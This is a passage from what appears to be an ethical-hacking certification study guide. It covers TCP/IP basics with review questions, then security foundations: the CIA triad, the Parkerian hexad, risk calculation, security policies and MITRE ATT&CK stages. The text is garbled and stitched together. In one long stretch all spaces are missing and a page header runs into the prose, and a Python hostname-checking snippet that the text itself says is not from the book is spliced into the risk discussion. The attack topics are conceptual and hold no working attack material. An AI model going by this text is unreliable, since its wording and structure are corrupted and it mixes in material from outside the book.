The other model, perhaps thought of as an architecture, is TCP/IP. This is sometimes called the DARPA model because the ARPAnet where the protocol suite was developed was funded by DARPA. Unlike OSI, which was developed entirely conceptually, TCP/IP describes an as-built design. Rather than seven layers as in OSI, TCP/IP has four layers, though those four layers encompass the same set of functionalities. TCP/IP includes the Link, Internet, Transport, and Application layers. The Link layer of the TCP/IP architecture encompasses the Physical and Data Link layers from the OSI model, while the Application layer takes in the Session, Presentation, and Application layers from the OSI model.

It's often easier to view network layouts conceptually rather than physically. There are topologies that are commonly used. A bus network has a single backbone cable to which everything connects. A star network has a central access device like a switch or hub and all devices connect back to that. A ring network is actually wired, commonly, like a star but it behaves like a ring where messages travel around the ring looking for the systems. There are also mesh networks, where there are direct connections from one device to another. In a full mesh network, every device has a connection to every other device in the network. You'll also see hybrid networks a lot. A common hybrid is the star-bus, where the central access devices, like a switch, are all wired together through a bus.

The Internet runs on the TCP/IP suite, and most businesses also use TCP/IP these days. When looking at system communications, you will run across protocols like Ethernet that take care of connecting endpoints like desktop computers to the network. Ethernet communication happens through the use of MAC addresses. Any device on a local network wanting to communicate with another device on the same local network would do it using the MAC address. At the Network or Internet layer is IP. IP is a best-effort delivery protocol, meaning that the protocol has mechanisms that help ensure that messages (called packets, which is the protocol data unit at this layer) can get from the source to the destination. These mechanisms are expressed in a series of header fields like the source and destination IP addresses and the IP identification field, in case packets need to be fragmented.

TCP and UDP are at the Transport layer. They provide ports to enable multiplexing—meaning multiple applications can make use of network functionality at the same time by listening on a different port than the port on which another application listens. TCP, whose PDU is called a segment, uses a three-way handshake and also sequence numbers to guarantee delivery of messages in the correct order. TCP uses a connection-oriented model. UDP, on the other hand, whose PDU is a datagram, is an unreliable and connectionless protocol. UDP datagrams don't have to be acknowledged or replied to.

Different-sized networks are referred to in different ways. A LAN would be a network that is contained within a small geographic area like a floor, building, or campus. A MAN is larger than a LAN, covering perhaps an entire city, but smaller than a WAN. A WAN covers a large geographic area, like the United States. This may be used by a very large business that connects all of its offices together. A service provider's network would also be called a WAN.

Cloud computing is often used by both individuals and
businesses. You can use cloud storage like Google Drive, Microsoft's OneDrive, or Dropbox. You can also create an entire business infrastructure network using IaaS. This is available from companies like Google, Amazon, and Microsoft, which all offer virtual machines that can be provisioned and turned up very quickly. Businesses can make use of these services to provide services outside of their internal networks. They can be used as a quick fallback to existing infrastructure. Additionally, small startups don't have to invest a lot of capital in systems. They can pay for what they use when they develop network-facing applications, like web services.

Companies can also use these cloud providers to support and manage embedded devices like thermostats, garage door openers, DVRs, and other similar devices. Amazon and Microsoft both have IoT support systems. They can be used to register, manage, and communicate with a wide variety of devices that are connected to home and business networks around the world.

Review Questions

You can find the answers in the appendix.

1. Which of these devices would not be considered part of the Internet of Things?
A. Smartphone
B. Thermostat
C. Light bulb
D. Set-top cable box

2. If you wanted a lightweight protocol to send real-time data over, which of these would you use?
A. TCP
B. HTTP
C. ICMP
D. UDP

3. What order, from bottom to top, does the TCP/IP architecture use?
A. Network Access, Network, Transport, Application
B. Link, Internet, Transport, Application
C. Physical, Network, Session, Application
D. Data Link, Internet, Transport, Application

4. Which of these services would be considered a storage as a service solution?
A. Microsoft Azure
B. iCloud
C. Google Compute
D. DropLeaf

5. The UDP headers contain which of the following fields?
A. Source address, destination address, checksum, length
B. Destination port, source port, checksum, length
C. Flags, source port, destination port, checksum
D. Length, checksum, flags, address

6. What are the three steps in the TCP handshake as described by the flags set?
A. SYN, SYN/URG, RST
B. RST, SYN, ACK
C. SYN, SYN/ACK, ACK
D. SYN, SYN/ACK, ACK/URG

7. Which of these protocols would be used to communicate with an IoT device?
A. ICMP
B. SMTP
C. Telnet
D. HTTP

8. Which network topology are you most likely to run across in a large enterprise network?
A. Ring topology
B. Bus topology
C. Full mesh
D. Star-bus hybrid

9. If you were to see the subnet mask 255.255.252.0, what CIDR notation (prefix) would you use to indicate the same thing?
A. /23
B. /22
C. /21
D. /20

10. Which of these addresses would be considered a private address (RFC 1918 address)?
A. 172.128.10.5
B. 9.10.10.7
C. 172.20.128.240
D. 250.28.17.10

11. If you were looking for the definitive documentation on a protocol, what would you consult?
A. Request for comments
B. Manual pages
C. Standards
D. IEEE

12. The PDU for TCP is called a ______________.
A. Packet
B. Datagram
C. Frame
D. Segment

13. Which header field is used to reassemble fragmented IP packets?
A. Source address
B. IP identification
C. Don't fragment bit
D. Acknowledgment field

14. Which protocol is necessary to enable the functionality of traceroute?
A. HTTP
B. SNMP
C. ICMP
D. IP

15. What is a MAC address used for?
A. Addressing systems over a VPN
B. Addressing systems through a tunnel
C. Addressing systems over TCP
D. Addressing systems on the local network

Chapter 3
Security Foundations

THE FOLLOWING CEH TOPICS ARE COVERED IN THIS CHAPTER:
✓ Network security
✓ Firewalls
✓ Vulnerability scanners
✓ Security policies
✓ Security policy implications
✓ Information security tools
✓ Information security attack detection

Organizations generally spend a lot of time and money on defenses and mitigations against attacks. There are some fundamental concepts that go into the planning and implementation of these defenses. In this chapter, we're going to cover some of the subject matter that helps security professionals make decisions about how best to protect enterprises. Some of this is foundational, but it's necessary in order to build on it. By the end of the chapter, you'll have the basics behind you, and we'll have started to talk about hard, defensive mechanisms. You will run across many of these if you are acting as an ethical hacker.

First, you need to understand what is meant by information security—what events fall into the security bucket. These ideas are commonly referred to as the triad or the CIA triad. It's an essential concept for
people who hold a Certified Information Systems Security Professional (CISSP) certification, which is a certification that covers the entire gamut of information security topics. The triad is a good foundation to understanding so much else about information security.

Alongside knowing what you are protecting against, you need to know what you are protecting. Performing risk assessments will help with that. Identifying potential risks and associated potential losses can help with decision-making around where to expend limited resources—budget, staffing, capital expenditures, and so on. It will also help security professionals determine what policies they need in place to guide the actions of employees overall and, more specifically, information technology staff. From policies flow standards and procedures. They are all considered essential for determining how a company approaches protecting its information assets.

Once you have your policies in place, decisions can be made about how best to protect information resources. Beyond staffing, there is technology that can be brought to bear. There are a number of devices that can be placed into a network to help with information protection. These are meant not only to keep attackers out but also to provide information that can be used to identify intrusions, including the path an attacker may have taken to gain access to networks and systems. There may also be elements that are placed in the network that can automatically detect an intrusion attempt and then block that attempt.

The technology alone doesn't provide protection. Where these elements and devices are placed is important, and those decisions are made based on ideas such as defense in depth and defense in breadth. These ideas help to define a complete security architecture. Alongside the security devices, there are system-level mechanisms that can be very helpful in providing more context to the information provided by firewalls and intrusion detection systems. All of these elements and decisions together are needed to create a complete defense of the enterprise.

The Triad

The triad is a set of three attributes, or properties, that define what security is. The three elements are confidentiality, integrity, and availability. Each of these properties needs to be taken into consideration when developing security plans. Each of them, to varying degrees of importance, will be essential in planning defenses. Not every defense will incorporate each of the three properties to the same extent. Some defenses impact only one property, for instance. From an attack perspective, a tester or adversary would be looking to compromise one of these elements within an organization. You will commonly see these three elements referred to as the CIA triad. This is not intended to be confused in any way with the Central Intelligence Agency.

Figure 3.1 shows the three elements represented as a triangle, as the triad is often depicted. One reason it is shown that way is that with an equilateral triangle, all the sides are the same length. They have the same value or weight, which is meant to demonstrate that none of the properties of the triad is any more important than any of the other properties. They all have equal value when it comes to the overall security posture of an organization. Different situations will highlight different elements, but when it comes to the overall security of an organization, each is considered to have equal weight to have a well-balanced approach.

FIGURE 3.1 The CIA triad (an equilateral triangle whose sides are labeled Confidentiality, Integrity, and Availability)

Something else that might occur to you, as you look at the figure, is that if any of the sides are removed or compromised, it's no longer a triangle. The same is true when it comes to information security. If any of these properties is removed or compromised, the security of your organization has also been compromised. It takes all of these properties to ensure that you and your information are being protected.

Confidentiality

Perhaps we should go back to kindergarten for this, though you may have more recent memories or experiences that apply. There are always secrets when you're young, and it
seems like they are always shared in very conspiratorial, whispered tones on the very edge of the schoolyard. You expect that when you share a secret with your friend, that secret will remain between you and your friend. Imagine, after all, if you were to tell your friend that you really, really, really liked the person who sat behind you in class and your friend were to tell that person. That would be mortifying, though the mortification level would likely be in inverse relationship to your age. When your friend shares your secret, assuming they do, they have breached your confidence. The secret you have shared with them is no longer confidential. You won't know whether you can continue to trust your friend. One of the challenges is that you might have shared your secret with two friends. You then hear about the secret from someone else altogether. You don't know without probing further which friend may have been the one to tell. All you know is that confidentiality has been breached.

In the digital world, confidentiality still means keeping secrets, so nothing much changes there. This, though, encompasses a lot of different aspects. It means making sure no one gets unauthorized access to information. This may mean using strong passwords on your user accounts to make sure attackers can't get in. It may mean keeping certain information offline so it can't be accessed remotely. Commonly, though, a simple way to achieve confidentiality is through the use of encryption.

When we are talking about confidentiality here, we should be thinking about it in two dimensions—static and dynamic. Static would be protecting data that is considered "at rest," which means it's not moving. It is probably stored on disk and not being used or manipulated. The second type, dynamic, is when the data is moving, or "in motion." This refers to data when it is being sent from one place to another. This may include your web browser asking for and then retrieving information from a web server. As the data is being transmitted, it is in motion. It's this transmission that makes it dynamic and not necessarily that it is being altered, though data being sent from one place to another could definitely be experiencing alteration through interaction with the user and the application.

When we are making use of encryption for web-based communication, the Secure Sockets Layer/Transport Layer Security (SSL/TLS) protocols are used. While TLS has long since superseded SSL, it is still sometimes referred to as SSL/TLS. Regardless of how it's referred to, though, it is a set of mechanisms for encrypting data. SSL and TLS both specify how to generate encryption keys from data that is known, as well as some partial data that is transmitted from one side to the other. Since encrypted data can't be read without a key, the confidentiality of the data is protected. This is not to say that encryption guarantees confidentiality. If an attacker can get to the key in some way, the attacker can then decrypt the data. If the data is decrypted by someone who shouldn't have seen it, confidentiality has of course been compromised. Attacks against the encryption mechanisms—ciphers, key exchange algorithms, and so on—can also lead to a compromise of confidentiality. A successful attack against the encryption, and there have been successful attacks against various encryption methods and standards, will lead to ciphertext being decrypted.

Integrity

In addition to having data be confidential, we also generally expect it to be the same from the moment we send it to the moment it's received. Additionally, if we store the data, we expect the same data to be intact when we retrieve it. This is a concept called integrity. Data integrity is important. It can be compromised in different ways. First, data can be corrupted. It can be corrupted in transit. It can be corrupted on disk or in memory. There are all sorts of reasons data gets corrupted. Many years ago, I started getting a lot of corrupted data on my disk. I replaced the disk and still got a lot of corrupted data. In the end, it turned out that I had bad memory. The bad memory was causing data being written out to disk to be corrupted. Bad components in a computer system happen, and those bad components can result in data loss or corruption.

Sometimes, mistakes happen as well. Perhaps you have two documents up and you are working in them at the same time. One of them is a scratch document with notes for the real document. You mistakenly overwrite a section of the real document, thinking you are in the scratch document, and then, because you don't trust autosave, you save the document you are working in. This might be considered a loss of data integrity because important pieces of the document you
are working in have been altered. If you don't have a backup from which to replace data, you may not be able to recover the original, and it could be that you don't even notice the mistake until the document has been sent around the office with the text containing the mistake in it. Suddenly, information is being shared that is incorrect in some way.

A man-in-the-middle attack is one way for an attacker to compromise integrity. The attacker intercepts the data in transit, alters it, and sends it on the way. When you browse to a website that uses encryption, a certificate is used to provide keying, meaning the certificate holds keys used for encryption and decryption. When a certificate contains a name that is different from the hostname being visited, your browser will generate an error, as you can see in Figure 3.2.

FIGURE 3.2 An error message about an apparently invalid certificate

What the certificate says, though it's not shown in the error, is that it belongs to www.furniturerow.com. However, the website that was visited was www.sofamart.com. If you didn't know that the Furniture Row company owned Sofa Mart, you might begin to question whether you were being hijacked in some way. An attack in this situation may have resulted in an attacker gathering information from your session, which you wouldn't have expected because you believed the session was encrypted. Worse, the information you got could have been altered while the attacker got the real information. There are many cases where that may be a realistic scenario.

Integrity, it turns out, is very complex. There are so many cases where integrity can be violated and we've only scratched the surface. Integrity isn't only about the contents of the data. It may also be the integrity of the source of the information. Imagine writing a letter and digitally adding a signature so it appears to have been written by someone else. When you start thinking about integrity, you may come up with many examples.

Availability

This is perhaps the easiest to understand and one of the most commonly compromised properties. It comes down to whether information or services are available to the user when they are expected to be. As with the other properties, this may be a case of mistakes and not necessarily malicious. If you were to keep information on an external drive, then go somewhere—work, on site with a client—and forget to bring the drive, the files on that drive wouldn't be available. It wouldn't be malicious, but it would still be a failure of availability since you wouldn't be able to access what you need when you need it. You haven't lost the data. It's still intact. It just isn't where you need it when you need it to be there. That's a breach of availability.

Misconfigurations can result in problems of availability. Making a change to a service configuration without testing the change may result in the service not coming back up. In production, this can be very problematic, especially if it's not clear that the service failed. Some services will appear to have restarted when in fact the configuration caused the service start to fail. Even if it's a short period of time before the change has been rolled back, there is a possibility of users of the service not being able to perform the functions they expect. Recently, I was reading about a case of a cluster where six out of the seven devices took an upgrade cleanly while the seventh device was still on the older code. Because there were some incompatibilities with the communication between the older code and the newer code, all the devices went into a bad loop, shutting out all legitimate requests.

Malicious attacks are common as well. A denial-of-service (DoS) attack denies access to a service, which translates to the service being unavailable for legitimate traffic. Attackers can overwhelm the service with a lot of requests, making it difficult for the service to respond. A legitimate request would have a hard time getting through the noise, and even if the request got through, the service may not be able to respond. DoS attacks have been common for decades now, though the change in available bandwidth and other technology changes mean that the attacks have had to change along with the technology and bandwidth increases.

Parkerian Hexad

Not everyone believes that three properties are sufficient to encompass the breadth of information security. In 1998, Donn Parker extended the initial three properties by adding three more. These are not considered standard, because there is some debate as to whether it's necessary to break the additional properties out. The three additional properties Parker believes are necessary are as follows:

Possession (or Control)
Ifyouhadmistakenlyhandedtheexternaldrivementionedearliertoafriend,thinkingyouwerehandingthembacktheirdrive,thedrivewouldbeintheircontrol.Ifthefriendneverpluggedthedriveintolookatit,thedataonitwouldnotbesubjecttoabreachofconfidentiality.However,thefactthatthedriveisnotinyourcontrolanylongerdoesmeanthatitisnotavailabletoyou,meaningitisalossofavailability.Thisisonereasonthispropertyisn’tincludedintheprimarytriad,thoughitcanbeanimportantdistinction.Authenticity  Thisissometimesreferredtoasnonrepudiation.Theideaofauthenticityisthatthesourceofthedataordocumentiswhatitpurportstobe.Asanexample,whenyoudigitallysignanemailmessage,therecipientcanbecertainthatthemessageoriginatedfromyoubecausethemessageincludesyourdigitalsignature,whichnooneelseshouldhave.Ofcourse,inreality,allweknowisthatthemessagewassignedwithyourkey.Ifyourkeywasstolenorgivenaway,itcouldbeusedwithoutyou.Authenticityismakingsurethatwhenyougetapieceofdata,nomatterwhatitis,it’sactuallyfromwhereitpurportstobefrom.Utility  Let’ssayyouhavethatsameexternaldrivewe’vebeentalkingabout.It’snowmanyyearslater,andit’sbeeninadrawerforalongtime.It’sjustthedrive,though.Thereisnocablewithitbecausetheygotseparated.Youdon’thavethecableanymore,andadditionally,theinterfacesonyourcomputerhaveallchangedsincethelasttimeyouusedit.Nowyouhavedata,butitcannotbeused.Ithasnoutility.Personally,Ihaveanoldnine-­tracktapesittinginatubinthebasement.I’vehaditfordecades.It’scompletelyuselesstomebecauseIdon’thaveatapedriveoramainframetoreaditto.Additionally,it’slikelystoredinEBCDICandnotASCII.Allofthismakesthedataonthattapeuseless,despitethatitisinmypossessionandtechnicallyavailabletome.Whilethesepropertiesdoraisespecificideasthatareimportanttothinkabout,youcouldalsofitthescenariosintothethreepropertiesthatarepartoftheCIAtriad.Possessionandutilitysituationscouldbesaidtofallunderavailability,andauthenticitycouldbeplacedunderintegrity.Afterall,ifthesourceofapieceofdataissaidtobeonethingwheninfactitisn’t,theintegrityofthedataisinvalid.Whatyougetwitht
heParkerianhexadissomespecificcasesratherthanthebroaderconceptsfromtheCIAtriad.Ifit’smoreusefulforyoutobreakthemoutfromtheothersasyouarethinkingaboutwhatsecuritymeansandwhateventsaresecurity-­related,thehexadmaybemoreusefulforyouthanthetriad.64 Chapter3  SecurityFoundations■RiskVerysimply,riskistheintersectionoflossandprobability.Thisisacondensedidea,anditcantakealottounpack,especiallygivencommonmisunderstandingsofwhatriskis.AlongerversionofthissentimentisfoundinthedefinitionofriskatDictionary.com,whichsaysthatriskis“theexposuretochanceofinjuryorloss.”Thechanceinthedefinitionistheprobability,whichismeasurable.Lossorinjuryisalsomeasurable.Thismeanswecanapplynumberstoriskanditdoesn’thavetobesomethingamorphousorvague.Often,youwillseethetermriskusedwhenwhatthespeakerreallymeanstosayischance,orprobability.Someonemaysaythereisariskofsomeeventhappening.Whatisreallymeantisthatthereisaprobabilityofthateventhappening,andpresumably,theeventisonethatcouldbeperceivedasnegative.Probabilitiescanbecalculatedifyouhaveenoughdata.Averysimplewaytocalculateprobability,whichiscommonlyexpressedasaratio,istodividethenumberofeventsbythenumberofoutcomes.Asanexample,whatistheprobabilityofanydayinAprilfallingonaweekend?Thereare30 daysinApril.That’sthenumberofoutcomes.Astherearetypically8 weekenddaysina30-­daymonth,thenumberofeventsis8.Theprobabilitythenis8/30,or8outof30.Ifyouwantedto,youcouldreducethatto4outof15,but8outof30saysthesamething,andit’sclearertoseewheretheinformationcamefrom.Ifyouwantedtorefinethat,youcouldaskaboutaspecificApriltoseeif,basedonhowthedaysaligned,thereweremorethan8 
weekenddaysthatyear.Probabilitiesofinformationsecurityeventsarehardertocalculate.Whatistheprobabilityofyourenterprisebeinghitbyadistributed(basedontheacronymyouareusing)denial-­of-­serviceattack?AccordingtoImpervaIncapsula,usingitsonlineDDoSDowntimeCostCalculator,theprobabilityofa2,500-­personcompanythatisinthee-­commercebusinessgettinghitwithaDDoSis36percent.That’s36eventsoutof100outcomes.Inthiscontext,westartgettingveryamorphous.Whatisaneventhere?Whatisanoutcome?Forevery100connectionattemptstoyournetwork,36 willbeDDoSmessages?Thatdoesn’tmakesense.AsIsaid,calculatingtheprobabilityofriskischallenging,andevenifyoudo,itmaybehardtounderstandtheresultsyouget.Lossis,perhaps,easiertoquantify,thougheventhereyoumayrunintochallenges.Let’ssaythatyourbusinesshasbeencompromisedandsomeofyourintellectualpropertyhasbeenexfiltrated.Sincetheintellectualpropertyisn’tgone,meaningyoustillhaveitinyourcontrol,whatisthetangibleloss?Itdependsonwhotookitandwhattheytookitfor.Ifsomeoneinanothercountrytookitandyourbusinessdoesn’tsellanyproductthere,isthereanactualloss?Certainly,therearecostsassociatedwithcleanup.Eventhere,though,itcanbechallenging.Somuchissoftcosts.Ifyoudon’tbringinanoutsidecontractortodothecleanupforyou,youareusingyourownpeople,whomyouarealreadypaying.Anoutsidecontractorwillhavehardcostsintheformofabillyourcompanywillbeexpectedtopay.Thatwillcomeoutofyourbottomline,sothereis,forsure,anumberthatcanbeappliedtolossthere.Howdoyoucalculatethecostofcleanupifit’syourownpeople,though?You’realreadypayingthem,sothecostisindeferredactionsonotherprojects.Risk 
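The name comparison behind the Figure 3.2 error, as an added example that is not from the book: a certificate issued to www.furniturerow.com does not cover www.sofamart.com, and the same check is what makes the authenticity property above concrete, since a name that does not match means the data is not from where it purports to be. The certificate dict is constructed in the shape Python's ssl.SSLSocket.getpeercert() returns, and the matching rules follow RFC 6125 (subjectAltName first, commonName only as a fallback, a wildcard only as the whole leftmost label).

```python
import ipaddress

def dns_name_matches(pattern, hostname):
    """Match one certificate DNS name against a hostname (case-insensitive).
    A wildcard counts only as the entire leftmost label and covers exactly one
    label: *.example.com covers www.example.com, not example.com, not
    a.b.example.com, and *.com is refused outright."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or any("*" in l for l in p_labels[1:]):
        return False
    return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]

def certificate_covers_host(cert, hostname):
    """Decide whether `cert` (dict in the shape of ssl.SSLSocket.getpeercert())
    was issued for `hostname`. Returns (ok, reason); ok=False is the condition
    under which a browser shows the Figure 3.2 error."""
    san = cert.get("subjectAltName", ())
    dns_names = [value for kind, value in san if kind == "DNS"]
    ip_names = [value for kind, value in san if kind == "IP Address"]
    try:
        wanted_ip = ipaddress.ip_address(hostname)
    except ValueError:
        wanted_ip = None
    if wanted_ip is not None:   # a literal IP only ever matches an iPAddress SAN
        if any(ipaddress.ip_address(n) == wanted_ip for n in ip_names):
            return True, f"{hostname} is listed in subjectAltName"
        return False, f"{hostname} is not listed in subjectAltName"
    if dns_names:               # when a SAN is present the commonName is ignored
        for name in dns_names:
            if dns_name_matches(name, hostname):
                return True, f"{hostname} matches subjectAltName entry {name}"
        return False, f"{hostname} matches none of subjectAltName {dns_names}"
    # Legacy fallback for certificates that carry no subjectAltName at all.
    cns = [value for rdn in cert.get("subject", ()) for kind, value in rdn
           if kind == "commonName"]
    for cn in cns:
        if dns_name_matches(cn, hostname):
            return True, f"{hostname} matches commonName {cn} (no subjectAltName)"
    return False, f"{hostname} matches neither a subjectAltName nor commonName {cns}"

# Constructed certificate standing in for the one behind Figure 3.2: issued to
# the Furniture Row site, then presented when the Sofa Mart hostname is visited.
FURNITURE_ROW_CERT = {
    "subject": ((("commonName", "www.furniturerow.com"),),),
    "subjectAltName": (("DNS", "www.furniturerow.com"), ("DNS", "furniturerow.com")),
}

if __name__ == "__main__":
    for host in ("www.furniturerow.com", "www.sofamart.com"):
        ok, why = certificate_covers_host(FURNITURE_ROW_CERT, host)
        print(("ok     " if ok else "ERROR  ") + why)
```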
Now, we know we can get values for loss and for probability. We can calculate risk from those two values by multiplying loss by probability. You end up with $risk = probability * loss. The dollar sign is included in there to be clear about the terms so you know what the end result means. The risk value you end up with is in dollars. This value is more meaningful in a comparative way. You can compare the risk of different events by using quantitative comparison if you know the monetary value of the loss and the probability. This means you are not comparing just loss and not just probability.

It can be tempting to think about risk as loss. A high-risk event to some is one where there is a catastrophic outcome. This is the way our brains are wired. Our brains look for bad things and try to avoid them. Because of that, if you were to ask someone what a high-risk event in their lives is, outside of information security, they may well give you an example of an event that may result in death, like driving. They don't take into account the actual probability of a catastrophic event happening. They only think about the potential outcome at its most extreme. This is called catastrophizing. It's not helpful when we are trying to evaluate risk in an information security context.

Risk is used as a way of identifying what is important. The goal of any information security program is to protect what is important and valuable. One way to quantify what is valuable is through the loss number. Higher loss may mean higher value. When you calculate the overall risk value, you can determine where to apply your resources. If you have an event that has a high risk value, it is probably a good idea to apply resources to protect against that event. Of course, predicting every possible event can be challenging. This is what makes information security difficult—understanding events, probabilities, and outcomes for your organization and then planning to protect against negative events.

When it comes to risk, there are other concepts that are important to consider. The first is threat. A threat is something that has the possibility to incur a breach of confidentiality, integrity, or availability. The avenue this breach may take is called a vulnerability. A vulnerability is a weakness in a system. This may be its software, its configuration, or how the entire information solution is put together. When the vulnerability is triggered, it is called an exploit. We exploit vulnerabilities, though not all vulnerabilities can be exploited. Race conditions are examples of vulnerabilities that may not be able to be exploited. A code review shows that there is a problem and the result of the problem could result in data corruption, for example. However, because of the speed at which the program executes, it's essentially impossible to sit in between the two instructions to make the change. Certainly not all vulnerabilities can be exploited by everyone.

A race condition is a programmatic situation where one process or thread is writing data while another process or thread is reading that data. If they are not tightly in sync, it's possible for the data to be read before it's written. It may also be possible to manipulate the data in between writing and reading. At its core, a race condition is a synchronization problem.

A threat agent or threat actor is an entity, like a person or group, that can instantiate a threat. The threat agent is who manifests a threat. The pathway the threat agent takes to exploit a vulnerability is called the threat vector. All of these concepts are important because they help to better understand where risk lies. Once you have identified what resources you care about, you should think about what threat agents may care about those resources. This can help you to identify potential vulnerabilities. Once you know what your vulnerabilities are and the potential threat vectors, you can start to think about how you are going to protect against those threats.

Policies, Standards, and Procedures

While we, as information security professionals, can often think about security for the sake of security as the most important thing, the fact is that security is a business enabler, not a business driver. This means security, in most cases, doesn't add to the bottom line. The lack of security or a weakness in security can take away from the bottom line. Because security is a business enabler, the business sets the parameters around what is important and the means to protect what is important. It does that by creating policies. Once the policies are created, standards are built out of those policies. Closest to where the work actually gets done are procedures. These are developed because of what the standards say.

Security Policies

A security policy is a statement of intention with regard to the resources of a business. It defines what a company considers to be security—what resources need to be protected, how resources should be utilized in a proper manner, how resources can or should be accessed. These policies are essential to good corporate governance, since the policies are lines that management draws. This means that having management set the tone and direction is not only a good idea, it's also required. Management and the board of directors have an obligation to the stakeholders in the business—the individual owners or the shareholders.

Security policies are not only about defining important resources, they are also about setting expectations of employees. Many organizations, for example, have an acceptable use policy. This is about defining what users can and cannot do. Any violation of this policy on the part of the employee is generally cause for sanction or termination, depending on the extent of the violation and the impact to the business. Of course, not all policies are directly about the users and their behaviors. There may be other security policies that are more directed at information technology or information security staff.

Keep in mind as you are thinking about security policy that the goals of your policies should be the confidentiality, integrity, and availability of information resources. These are the properties that a security policy should take into account. All information resources should be confidential, have integrity, and be available within the parameters defined by the business. This doesn't mean that all information resources should always be confidential, have integrity, and be available. Different information assets will have different levels of confidentiality, and not all information has to be available all the time. This is also part of what security policy is for—to help classify and prioritize the information assets of the organization.

Not all information resources are bits and bytes stored on computer systems. One area that policy should always take into consideration is how the human resources are to be handled. This may not always be codified in information security policy, but human resources should always be a factor, especially when it comes to protecting against natural disasters and other events that may be physically dangerous as well as impacting information assets.

Policies should be revisited on a regular basis. They are sufficiently high-level that they shouldn't change every time there is a new set of technologies available, but they should evolve with changes in the threat landscape. As information resources change and threat agents change, the policies may need to adapt to be responsive to those changes. As this is an area of corporate governance, any policy change would have to be approved by whatever management structure is in place—business owners, board of directors, and so on.

Keep in mind that security policies are all high-level. They don't provide specifics, such as how the policies should be implemented. If you're looking at security policies and you're starting to think about the operational impacts and how the administrator would handle the policy, you're too close to the ground, and it's time to beat your wings a bit more to get much higher up. Also, you are thinking conceptually for what should be long-term rather than something specific to a point in time. This means that technology and solutions have no place in the policy. Other information security program elements will take care of those aspects.

Security Standards

The security policy is at the top of the food chain. There may also be subpolicies that flow down from the top-level security policies. The subpolicy should refer to the overall policy so the high-level policy doesn't get lost. Below the policy level, though, are security standards. A standard is direction about how policies should be implemented. The standard starts down the path of how we get from statements of intent to implementation, so we start to drill down from the high level of the policy.

Security Standards

There are two meanings for the term security standard. There are sets of standards that provide guidance for organizations and are managed by standards bodies. The National Institute of Standards and Technology (NIST) has a set of standards, documented in several special publications. The International Organization for Standardization (ISO) maintains ISO 27001 and ISO 27002. There are other standards documents that may be relevant to you, depending on where you are in the world.

Take, for example, a policy that states that all systems will be kept up-to-date. To get closer to implementation of that policy, you might have standards that relate to desktop systems, server systems, network devices, and any embedded device. The requirements for each of those device types may be different, so the standards for them may be different. Desktop systems may just be expected to take all updates as they come, with the expectation that any potential outage could be remediated quickly on the off chance that there was an outage on a handful of users' desktops. Servers, on the other hand, would be in place to service customers and possibly have revenue impacts. Since that's the case, the standard may be different. The standard, still focused on how to achieve the objective set out in the policy, may say that there is a quality assurance process that is necessary before patches may be deployed. The service level agreement (SLA) on those server systems may be completely different in terms of acceptable outages.

The standard for the server systems may be different from the desktop systems, but both are written in service of the high-level policy that systems are kept up-to-date. The standard would define anything that was vague (what does "up-to-date" mean?) in the policy to make it relevant to operational staff. The standards are still high level in the sense of setting requirements for how policies should be implemented. These requirements still need to be implemented. That leads us to another step.

Procedures

Procedures are the actual implementation of the standard. These provide guidance about how, specifically, the standards are achieved at a granular level. This may be accomplished with step-by-step instructions on what needs to be done. There may be multiple procedures for each standard, since there may be multiple organizations involved in implementing the standard.

You can see that with high-level guidance like that in a policy, you likely wouldn't have to touch it often. Policies are revisited on a regular basis, but the timescale for when the policies change would be measured in years, if the policies are well considered and well written. Standards, though, may need to be updated more regularly. Information asset changes would result in standards being updated. Any change in technology within the organization may result in an update to standards. Procedures will likely change even more regularly. As organizations in the company shift or responsibilities shift, procedures will shift to accommodate them. Additionally, a good procedure would have feedback loops built in so the procedure could be regularly revised to be more efficient. Any change in automation would result in procedure changes. As we go through each layer from the top of the security program down to the very bottom, the result is more regular updates as we get to specific steps in implementation and administration.

Guidelines

You may not run into guidelines as you are looking at security programs. Guidelines are not standards in that they may not be requirements. Instead, they are suggestions on how policies may be implemented. A guideline may provide information about best practices, with the hope that the best practices may follow.
Organizing Your Protections

There are a lot of different ways of thinking about information security, of course. From a governance perspective, you need to think about policies, standards, and procedures. However, once you have all of those in place, you still need to think about how you are going to best protect your assets, not to mention ensure you are able to detect any attempt to negatively impact those assets, no matter what they are. One way to think about evaluating protections of your assets is by reviewing what attackers are most likely to do. If you know what actions the attackers are going to take, you could develop not only protections but also detections of those actions, which helps you to be prepared.

While you can use the Lockheed Martin cyber kill chain or the attack lifecycle advocated by FireEye Mandiant, another way to get even more detail is to make use of the MITRE ATT&CK Framework. The MITRE Corporation developed ATT&CK in 2013 to collect common tactics, techniques, and procedures (TTPs) used by attackers. The way MITRE saw it, existing frameworks like the cyber kill chain were too high level and not applicable to real-world incidents. The idea behind ATT&CK is to collect these TTPs from adversaries, so the collection is always growing as more TTPs are identified. These TTPs are described in detail, so protection and detection controls can be developed.

While there are different attacker types, including hacktivists who may be just looking to make a point in the public consciousness, the most dangerous ones are ones that are sometimes called advanced persistent threats (APTs). These are attackers who use a large number of TTPs to gain access to a business environment and remain within the environment for as long as they can. In some cases, these attackers may remain in place for years. There have been cases in recent memory where attackers have been found to have remained in place for seven or ten years or more. While you may get some attackers who might do a one-and-done approach, where they are targeting individual users and want to just get what they can and get out, increasingly, what we see is these APT attackers. This is worth keeping in mind as you look through the different phases of the ATT&CK framework.

The ATT&CK Framework is broken out into the following stages. You may find these aren't necessarily in the order an attacker may follow, as there may be some overlap or even bouncing back and forth. Additionally, some TTPs will fit into different categories here.

Reconnaissance
The attacker is gathering information about the target in this stage. They may be searching through open sources where data is freely available. They may also be using closed sources they have access to. Additionally, they may be performing scanning activities here. This stage also includes attackers using phishing techniques to trick victims to give up data.

Resource Development
The attacker has to do a lot of work to create an infrastructure they will use to launch attacks from. This may include registering domain names, creating accounts, acquiring systems (probably by compromising other victims and using their computing infrastructure). They may also need to acquire tools they don't have themselves. This could be renting or purchasing toolsets that may be available through criminal channels.

Initial Access
The attacker here compromises the first systems. They may compromise an existing public-facing application or website. They may use phishing to get malware installed on a target system. They are getting their initial foothold into the organization in this stage. Any technique that gives them access, even if it's as simple as making use of a compromised set of credentials, falls into this stage.

Execution
